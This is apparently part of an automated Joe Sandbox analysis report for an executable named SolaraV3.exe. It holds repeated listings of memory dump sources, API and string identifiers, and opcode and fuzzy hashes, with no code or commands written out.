                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                              • API String ID: 3580290477-3821142706
                                                                                                                                                                                                                              • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                              • Instruction ID: cf413cdc6034cf69c3cfac53a21962f8c7e91602477c9449305620ca662dacc8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A419332A08B0A85EB16DF29D4610BD67A4EF457E0B556037EA4E87B85DF3DE4A3C300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                              • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                              • Instruction ID: 95180ee3ee2303403aed47978d376b4598dc0a8f2f4035bad47d2dd0ca4144db
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF41C532728A5985DB208F69E4553AD6761FB88784F545132EE8DC7794EF3CD412CB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007B1170
                                                                                                                                                                                                                              • String ID: ..\s\crypto\x509v3\v3_utl.c$E
                                                                                                                                                                                                                              • API String ID: 1749704820-2813183830
                                                                                                                                                                                                                              • Opcode ID: 6e13b30c986bf9580dcb7ec6a5b8c4a30080d2e2f9cbe34a24dfbf94d626d381
                                                                                                                                                                                                                              • Instruction ID: 4fd789209ce09a13f2b350cd5ae5b882c35ca1af8887cce7fe233c91c405eb68
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e13b30c986bf9580dcb7ec6a5b8c4a30080d2e2f9cbe34a24dfbf94d626d381
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B412DA1B0A74281FA54EF32E400F696294AF55B80F88C835DE4E977B6DF3CE655CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                              • String ID: ..\s\crypto\rand\randfile.c$Filename=
                                                                                                                                                                                                                              • API String ID: 3568877910-2201148535
                                                                                                                                                                                                                              • Opcode ID: b92129e8508862641eed399a8e5179a0bb6c7147643e5021365d23c2bd3b3ffe
                                                                                                                                                                                                                              • Instruction ID: b426adcb18b199144a5d6d93dab1997cba6eb8a9153b0bc34aff202a2f847ac9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b92129e8508862641eed399a8e5179a0bb6c7147643e5021365d23c2bd3b3ffe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C317AE1A1978692EA20DB72E451FA97364FF94B84F408435DA4F877B5EF3CE5058B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$System$File
                                                                                                                                                                                                                              • String ID: gfff
                                                                                                                                                                                                                              • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                              • Opcode ID: 5bab4889fdff038a34dd7d6efd02d934e11c3433e8613633f5b88581a3d60216
                                                                                                                                                                                                                              • Instruction ID: 56196cb56b7463eb892ab780850593854ca4595356788fe269b658816bb5a708
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bab4889fdff038a34dd7d6efd02d934e11c3433e8613633f5b88581a3d60216
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B92161F2A2464786DB948F39E515B79B7E0EB88B88F849035EA4D87798DF3CD5408700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                              • Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                              • Instruction ID: 8cff24189984a63b990c5bd06bcecd1fed1e8df0bfbff823a69f48a4aef32553
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4210772B0868581FB209B19D06427D73B1FB88B84F554137EA8D83694DF7CE966CB41
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\extensions_srvr.c$3
                                                                                                                                                                                                                              • API String ID: 3568877910-3555168737
                                                                                                                                                                                                                              • Opcode ID: 6667dba7c5238e8d1662bf7e78e192f7ee7ee4d5288dc2d1f2b8f39ccf0876d4
                                                                                                                                                                                                                              • Instruction ID: 724d8ccf7e5f9c75a1d5a1d08722667b0ebf8099860c1132c838527492232a55
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6667dba7c5238e8d1662bf7e78e192f7ee7ee4d5288dc2d1f2b8f39ccf0876d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB21AEF2728B4186E7518B21E844BAC63A4EB48B84F584231DE4D47B95DF7DD6D0C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastgetsockname
                                                                                                                                                                                                                              • String ID: ..\s\crypto\bio\b_sock.c
                                                                                                                                                                                                                              • API String ID: 566540725-540685895
                                                                                                                                                                                                                              • Opcode ID: 5eba5f4fb37063eb421bd785aab33e1d3d53f176506f7daf47244a11d094d287
                                                                                                                                                                                                                              • Instruction ID: 8dd61f2013a47e9410adcb1bda4225053bc81b2a30eff3db5bc69462d3391caa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5eba5f4fb37063eb421bd785aab33e1d3d53f176506f7daf47244a11d094d287
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54218CF1A0820686E720DB71D805EEE6364EF80305F848635E65E86AB4DF7DE585CB50
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                              • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                              • Instruction ID: 4f0d37246fc5bd33a2aace6ee8c0f80a4060b6ed5d7b79440687495ec39ed506
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF112E32618B8582EB618F15E45025DB7E5FB88B84F584231EB8D47754DF3DD562C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                              • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                              • Instruction ID: b338db340c7240531f884c48a7cc9dc90d0fe9680b0080e81536ea76b986b95a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7018F22A1820A86FB30AF64947537EA7A0EF48744F941037D68DC2795EE2CE5268B24
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$System$File
                                                                                                                                                                                                                              • String ID: gfff
                                                                                                                                                                                                                              • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                              • Opcode ID: 47e4b42b83e78b7af79a6160f4da4c1814caf13c39811c5425ac0f60e84bf5e8
                                                                                                                                                                                                                              • Instruction ID: 2e06851da1746ea1516c992b07002f98d1807ea2321531fcfe1d82d766e0aa57
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47e4b42b83e78b7af79a6160f4da4c1814caf13c39811c5425ac0f60e84bf5e8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F01DBE2B2454542DF60DB35F805A59A7A0EBCC784B449031EA4DCB765EF3CD1418B40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                              • String ID: !$..\s\crypto\ct\ct_policy.c
                                                                                                                                                                                                                              • API String ID: 3568877910-3401457818
                                                                                                                                                                                                                              • Opcode ID: eea727c2c650749376e6f7709fbe9c773a3b3b2520ee859c13efa1a6d34b5bfc
